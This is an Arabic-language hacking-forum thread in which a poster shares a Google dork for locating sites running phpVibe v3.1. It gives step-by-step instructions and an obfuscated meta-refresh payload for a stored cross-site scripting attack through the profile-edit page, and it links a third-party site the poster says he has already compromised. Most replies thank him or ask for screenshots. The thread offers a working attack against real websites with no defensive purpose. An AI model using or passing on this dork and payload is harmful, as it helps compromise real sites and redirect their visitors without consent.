ثغرة xss-2013 تعال طبق

[Iraqe Hacker]

بسم الله الرحمن الرحيم
السلام عليكم اخواني
بدون مقدمات الكل يعرف هاي الثغرة
الدورك تضعو في كوكل
"Powered by phpVibe v3.1"
الاستغلال
-How to Exploit-
نذهب للتسجيل وحط اي ايميل وهمي
http://site.com/register.php
بعد التسجيل نذهب لهذا المسار للحقن بعدين تحط الكود مالك لتحقن الصفحة
http://site.com/edit-profile.php
وتذهب لمسار الاعضاء وطغط على عضويتك
http://site.com/members/
سيتم تطبيق الكود الخليتو مثال انا خليت كود يتم تحويلي لموقع اني مخترقو قبل
فقط اضغط على عضويتي
http://digitalsportsbar.com/user/2/iraqe-hacker/
وهذا الكود الي طبقتو
">"" > > < me t a http-e q u i v="Refresh" content="0;url=http://atala.is">"">
الي بلاحمر امسح الفراغات مابين الكلمة المحددة
==========================
المصدر
http://www.1337day.com/exploit/20325
تحياتي لكم

[keyboy]

أخي ممكن تشرح أكثر المرحلة الثانبة و مشكووووووووووووووووووووور

[3aziz_ziza3]

اخي مشكور وجزاك الله كل خير

[سارة الغامدي]

وآصل آبدآعك
يعطيك العافية

[الجليد المشتعل]

مشكـــؤر يعطيك الف عافية

[موآدع]

بطل حبيبي علم نافع ان شاء الله

[Iraqe Hacker]

شكرا لمروركم حبايبي تشرفت بيكم

[عبدالرحمن القميري]

الف شكر ياليت بالصور

[Iraqe Hacker]

الف شكر ياليت بالصور

ميحتاج صور شرح سهل تحياتي

[lmensi]

مشكـــؤر يعطيك الف عافية